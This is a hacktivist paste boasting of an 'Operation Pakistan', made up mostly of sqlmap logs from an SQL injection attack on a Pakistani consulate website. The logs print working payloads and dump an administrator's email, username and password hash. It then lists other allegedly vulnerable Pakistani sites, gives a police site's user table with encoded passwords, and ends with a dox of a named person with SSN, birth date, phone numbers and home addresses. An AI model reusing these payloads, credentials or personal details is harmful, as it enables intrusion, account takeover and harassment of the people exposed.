____ ____ ____ ____ ____ ____ ___ ____ _ _ _ ____ ___ ____ _ _ ____ ____ _ _ _ _ _ _ | __ |___ | | |__/ | |___ |__] |__| |_/ | [__ | |__| |\ | |___ |__| |\/| | | \_/ |__] | |__| | \ |___ |___ | | | | \_ | ___] | | | | \| | | | | | | |___ | #Operation #Pakistan. Hacking at its Finest. ~XTAM4 ~Mr.Instinct ~G Force Family #XTAM4 Operation planned by: Mr.Instinct Main Contributors: Xtam4, Axid Burn and Balalaika. Main Target: http://www.pakconsulatejeddah.gov.pk/index.php [*] starting at 15:13:28 [15:13:31] [INFO] testing connection to the target URL [15:13:37] [INFO] testing if the target URL is stable. This can take a couple of seconds [15:13:41] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c [15:14:08] [INFO] testing if GET parameter 'option' is dynamic [15:14:09] [INFO] confirming that GET parameter 'option' is dynamic [15:14:11] [INFO] GET parameter 'option' is dynamic [15:14:12] [WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable [15:14:12] [INFO] testing for SQL injection on GET parameter 'option' [15:14:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [15:14:13] [WARNING] reflective value(s) found and filtering out [15:14:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [15:14:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [15:14:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' [15:14:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [15:15:01] [INFO] testing 'MySQL inline queries' [15:15:02] [INFO] testing 'PostgreSQL inline queries' [15:15:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [15:15:06] [INFO] testing 'Oracle inline queries' [15:15:07] [INFO] testing 'SQLite inline queries' [15:15:08] [INFO] testing 'MySQL > 5.0.11 stacked queries' [15:15:08] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more) [15:15:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [15:15:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [15:15:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [15:15:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [15:15:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [15:16:01] [INFO] testing 'Oracle AND time-based blind' [15:16:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [15:17:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [15:17:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' [15:19:43] [WARNING] GET parameter 'option' is not injectable [15:19:43] [INFO] testing if GET parameter 'item' is dynamic [15:19:44] [INFO] confirming that GET parameter 'item' is dynamic [15:19:45] [INFO] GET parameter 'item' is dynamic [15:19:45] [WARNING] heuristic (basic) test shows that GET parameter 'item' might not be injectable [15:19:45] [INFO] testing for SQL injection on GET parameter 'item' [15:19:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [15:20:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [15:20:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [15:20:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' [15:20:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [15:20:44] [INFO] testing 'MySQL inline queries' [15:20:45] [INFO] testing 'PostgreSQL inline queries' [15:20:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [15:20:50] [INFO] testing 'Oracle inline queries' [15:20:52] [INFO] testing 'SQLite inline queries' [15:20:54] [INFO] testing 'MySQL > 5.0.11 stacked queries' [15:21:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [15:21:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [15:21:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [15:21:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [15:21:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [15:21:47] [INFO] testing 'Oracle AND time-based blind' [15:21:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [15:23:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [15:25:16] [WARNING] GET parameter 'item' is not injectable [15:25:16] [INFO] testing if GET parameter 'item_id' is dynamic [15:25:17] [INFO] confirming that GET parameter 'item_id' is dynamic [15:25:18] [INFO] GET parameter 'item_id' is dynamic [15:25:19] [INFO] heuristic (basic) test shows that GET parameter 'item_id' might be injectable (possible DBMS: 'PostgreSQL or MySQL') [15:25:19] [INFO] testing for SQL injection on GET parameter 'item_id' heuristic (parsing) test showed that the back-end DBMS could be 'PostgreSQL or MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y do you want to include all tests for 'PostgreSQL or MySQL' extending provided level (1) and risk (1)? [Y/n] y [15:25:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [15:26:15] [INFO] GET parameter 'item_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [15:26:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [15:26:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)' [15:26:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)' [15:26:26] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' [15:26:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [15:26:38] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' [15:26:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)' [15:26:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)' [15:26:58] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause' [15:27:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [15:27:06] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause' [15:27:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [15:27:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' [15:27:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' [15:27:12] [INFO] testing 'PostgreSQL error-based - Parameter replace' [15:27:13] [INFO] testing 'MySQL inline queries' [15:27:15] [INFO] testing 'PostgreSQL inline queries' [15:27:17] [INFO] testing 'MySQL > 5.0.11 stacked queries' [15:27:19] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [15:27:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [15:27:21] [INFO] testing 'PostgreSQL stacked queries (heavy query)' [15:27:23] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)' [15:27:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [15:27:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)' [15:27:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)' [15:27:52] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)' [15:28:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [15:28:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)' [15:28:10] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)' [15:28:12] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)' [15:28:16] [INFO] testing 'MySQL > 5.0.11 OR time-based blind' [15:29:16] [INFO] GET parameter 'item_id' is 'MySQL > 5.0.11 OR time-based blind' injectable [15:29:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [15:29:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found [15:29:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [15:29:28] [INFO] target URL appears to have 13 columns in query [15:30:01] [INFO] GET parameter 'item_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'item_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y sqlmap identified the following injection points with a total of 429 HTTP(s) requests: --- Place: GET Parameter: item_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: option=page&item=show&item_id=51 AND 2145=2145 Type: UNION query Title: MySQL UNION query (NULL) - 13 columns Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5) --- [15:32:31] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.2.23, PHP 5.2.17 back-end DBMS: MySQL 5.0.11 [15:32:31] [INFO] fetching database names [15:32:47] [INFO] the SQL query used returns 3 entries [15:32:49] [INFO] retrieved: "information_schema" [15:32:50] [INFO] retrieved: "pakcons_consulate" [15:32:58] [INFO] retrieved: "pakcons_tns" available databases [3]: [*] information_schema [*] pakcons_consulate [*] pakcons_tns [15:32:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk' [*] shutting down at 15:32:58 root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -- tables sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 15:34:27 [15:34:27] [INFO] resuming back-end DBMS 'mysql' [15:34:29] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: item_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: option=page&item=show&item_id=51 AND 2145=2145 Type: UNION query Title: MySQL UNION query (NULL) - 13 columns Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5) --- [15:34:34] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.2.23, PHP 5.2.17 back-end DBMS: MySQL 5.0.11 [15:34:34] [INFO] fetching tables for database: 'pakcons_consulate' [15:34:38] [INFO] the SQL query used returns 23 entries [15:34:39] [INFO] retrieved: "admin" [15:34:41] [INFO] retrieved: "blocks" [15:34:43] [INFO] retrieved: "gallery" [15:34:45] [INFO] retrieved: "gallery_images" [15:34:46] [INFO] retrieved: "news" [15:34:48] [INFO] retrieved: "pages" [15:34:52] [INFO] retrieved: "report_files" [15:34:53] [INFO] retrieved: "reports" [15:34:55] [INFO] retrieved: "slideshow" [15:34:56] [INFO] retrieved: "url_alias" [15:34:58] [INFO] retrieved: "users" [15:35:01] [INFO] retrieved: "videos" [15:35:02] [INFO] retrieved: "wp_commentmeta" [15:35:04] [INFO] retrieved: "wp_comments" [15:35:07] [INFO] retrieved: "wp_links" [15:35:09] [INFO] retrieved: "wp_options" [15:35:10] [INFO] retrieved: "wp_postmeta" [15:35:11] [INFO] retrieved: "wp_posts" [15:35:13] [INFO] retrieved: "wp_term_relationships" [15:35:15] [INFO] retrieved: "wp_term_taxonomy" [15:35:16] [INFO] retrieved: "wp_terms" [15:35:17] [INFO] retrieved: "wp_usermeta" [15:35:18] [INFO] retrieved: "wp_users" Database: pakcons_consulate [23 tables] +-----------------------+ | admin | | blocks | | gallery | | gallery_images | | news | | pages | | report_files | | reports | | slideshow | | url_alias | | users | | videos | | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_terms | | wp_usermeta | | wp_users | +-----------------------+ [15:35:18] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk' [*] shutting down at 15:35:18 root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -T admin --columns sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 15:36:44 [15:36:45] [INFO] resuming back-end DBMS 'mysql' [15:36:47] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: item_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: option=page&item=show&item_id=51 AND 2145=2145 Type: UNION query Title: MySQL UNION query (NULL) - 13 columns Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5) --- [15:36:51] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.2.23, PHP 5.2.17 back-end DBMS: MySQL 5.0.11 [15:36:51] [INFO] fetching columns for table 'admin' in database 'pakcons_consulate' [15:36:56] [INFO] the SQL query used returns 5 entries [15:36:57] [INFO] retrieved: "id","int(11)" [15:36:58] [INFO] retrieved: "full_name","varchar(100)" [15:36:59] [INFO] retrieved: "username","varchar(100)" [15:37:01] [INFO] retrieved: "password","varchar(100)" [15:37:03] [INFO] retrieved: "email","varchar(100)" Database: pakcons_consulate Table: admin [5 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | email | varchar(100) | | full_name | varchar(100) | | id | int(11) | | password | varchar(100) | | username | varchar(100) | +-----------+--------------+ [15:37:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk' [*] shutting down at 15:37:03 root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51%27" -D pakcons_consulate -T admin -C email,full_name,id,password,username --dump sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 15:38:20 [15:38:20] [WARNING] it appears that you have provided tainted parameter values ('item_id=51'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to properly run Are you sure you want to continue? [y/N] n [*] shutting down at 15:38:33 root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -T admin -C email,full_name,id,password,username --dump sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 15:39:08 [15:39:08] [INFO] resuming back-end DBMS 'mysql' [15:39:11] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: item_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: option=page&item=show&item_id=51 AND 2145=2145 Type: UNION query Title: MySQL UNION query (NULL) - 13 columns Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5) --- [15:39:18] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.2.23, PHP 5.2.17 back-end DBMS: MySQL 5.0.11 [15:39:18] [INFO] fetching columns 'email, full_name, id, password, username' for table 'admin' in database 'pakcons_consulate' [15:39:18] [INFO] the SQL query used returns 5 entries [15:39:19] [INFO] retrieved: "id","int(11)" [15:39:21] [INFO] retrieved: "full_name","varchar(100)" [15:39:22] [INFO] retrieved: "username","varchar(100)" [15:39:23] [INFO] retrieved: "password","varchar(100)" [15:39:24] [INFO] retrieved: "email","varchar(100)" [15:39:24] [INFO] fetching entries of column(s) 'email, full_name, id, password, username' for table 'admin' in database 'pakcons_consulate' [15:39:24] [INFO] the SQL query used returns 1 entries [15:39:25] [INFO] retrieved: "amirrkkhan@gmail.com","M. Amir Khan","1","1c677... [15:39:25] [INFO] analyzing table dump for possible password hashes [15:39:25] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y [15:39:43] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-8nqFtk.txt' do you want to crack them via a dictionary-based attack? [Y/n/q] n Database: pakcons_consulate Table: admin [1 entry] +----+----------------------+-------------+----------------------------------+--------------+ | id | email | username | password | full_name | +----+----------------------+-------------+----------------------------------+--------------+ | 1 | amirrkkhan@gmail.com | pakadmincon | 1c6770d0e097b9a1dc3b76767991ba85 | M. Amir Khan | +----+----------------------+-------------+----------------------------------+--------------+ [15:39:46] [INFO] table 'pakcons_consulate.admin' dumped to CSV file '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk/dump/pakcons_consulate/admin.csv' [15:39:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk' ----------------------------------------------------------------------------------------------------------------- #Mr.Instinct http://www.stat.com.pk/search.php?modid=422 http://www.hotline.pk/search.php?&visit=422 http://www.playtube.pk/search.php?q=indian+songs&st=169&o=rating http://indusblog.com.pk/indusblog/indusblog%20backup/ http://dev.evsoft.pk/evs/hameed/EVS%20Point%20of%20Sales/evs%20posv%20last%20backup%2027-05-14/evs%20posv/ http://www.stat.com.pk/search.php?modid=422 http://www.hotline.pk/search.php?&visit=422 http://www.playtube.pk/search.php?q=indian+songs&st=169&o=rating http://pharmapack.pk password:djihade http://www.clickme.com.pk/search.php?searchfiled=jgfc&categoryfiled=0 http://profile.hec.gov.pk/index.php?comp=forgot-password.php http://pogo.pk/new/backup-12.2.2013_00-47-59_pakistan http://indusblog.com.pk/indusblog/indusblog%20backup/ http://dev.evsoft.pk/evs/hameed/EVS%20Point%20of%20Sales/evs%20posv%20last%20backup%2027-05-14/evs%20posv/ http://www.clickme.com.pk/search.php?searchfiled=jgfc&categoryfiled=0 ---------------------------------------------------- #Axid Burn http://swissbusinesscouncil.com.pk/pages.php?pageid=7'&id=4' http://www.amch.edu.pk/page_detail.php?page_id=61' http://www.amch.edu.pk/page.php?page_id=34' http://www.arttechniques.com.pk/page.php?page_id=21' http://www.mb.com.pk/products.php?id=28%27' http://www.jsm.com.pk/products/details?pr=9' http://prcs.org.pk/page.php?pg_id=52' http://www.prcs.org.pk/faq.php http://finance-mansehra.gov.pk/hospitals.php http://www.hangal.com.pk/quickLinks.php ---------------------------------------------------- #El-Capitân Balalaika http://www.faisalabadpolice.gov.pk/ admin panel not found http://www.faisalabadpolice.gov.pk/page.php XSS vulnerable +------+----------------------+--------+--------------------+ | u_id | u_pass | u_type | u_name | +------+----------------------+--------+--------------------+ | 6 | U2FqYU5TYWllTjc4Ng== | 0 | allahg1 | | 7 | MTIzNDU= | 1 | Balochani | | 8 | MTIzNDU= | 1 | Civil Lines | | 9 | MTIzNDU= | 1 | Rail Bazar | | 10 | MTIzNDU= | 1 | Kotwali | | 11 | MTIzNDU= | 1 | Jhang Bazar | | 12 | MTIzNDU= | 1 | Women | | 13 | MTIzNDU= | 1 | Gulberg | | 14 | MTAwMjE= | 1 | GM Abad | | 15 | MTIzNDU= | 1 | Raza Abad | | 16 | MTIzNDU= | 1 | Peoples Colony | | 17 | MTIzNDU= | 1 | Madina Town | | 18 | MTIzNDU= | 1 | Sargodha Road | | 19 | MTIzNDU= | 1 | Mansoor Abad | | 20 | MTIzNDU= | 1 | Nishat Abad | | 21 | MTIzNDU= | 1 | Millat Town | | 22 | MTIzNDU= | 1 | Chak Jhumra | | 23 | Nzg2YXNpZg== | 1 | Sahianwala | | 24 | MTIzNDU= | 1 | Batala Colony | | 25 | MTIzNDU= | 1 | D-Type Colony | | 26 | MTIzNDU= | 1 | Factory Area | | 27 | MTIzNDU= | 1 | Saman Abad | | 28 | MTIzNDU= | 1 | Dijkot | | 29 | MTIzNDU= | 1 | Sadar | | 30 | MTIzNDU= | 1 | Thekriwala | | 31 | MTIzNDU= | 1 | Sandalbar | | 32 | MTIzNDU= | 1 | City Jaranwala | | 33 | MTIzNDU= | 1 | Sadar Jaranwala | | 34 | MTIzNDU= | 1 | Satiana | | 35 | MTIzNDU= | 1 | Rodala Road | | 36 | MTIzNDU= | 1 | Lundianwala | | 37 | MTIzNDU= | 1 | Khurrianwala | | 38 | MTIzNDU= | 1 | City Samundari | | 39 | MTIzNDU= | 1 | Sadar Samundari | | 40 | MTIzNDU= | 1 | Mureed Wala | | 41 | MTIzNDU= | 1 | Tarkhani | | 42 | MTIzNDU= | 1 | City Tandlianwala | | 43 | MTIzNDU= | 1 | Sadar Tandlianwala | | 44 | MTIzNDU= | 1 | Bahlak | | 45 | bWFuem9vcg== | 1 | Garh | | 46 | MTIzNDU= | 1 | Mamon Kanjan | | 53 | b3JwMTIz | 2 | pro | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://sbp.org.pk Entire site is XSS vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.aaj.tv/ XSS vulnerable 83+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Doxes/Hits: John O Brennan SSN: 146-42-3250 DOB: 09/22/1955 Phone Number's: (703) 435-8772, (703) 738-2877, (703) 435-7720,(703) 435-8772, (703) 742-3349 Address: 13251 Point Rider Ln Herndon, VA 20171 Previous Addresses: PO Box 597 Warrenton, VA 20188 6857 Lafayette Park Dr Annandale, VA 22003 John O Brennan armed Al Qaeda, and Tehreek-E-Taliban in Pakistan.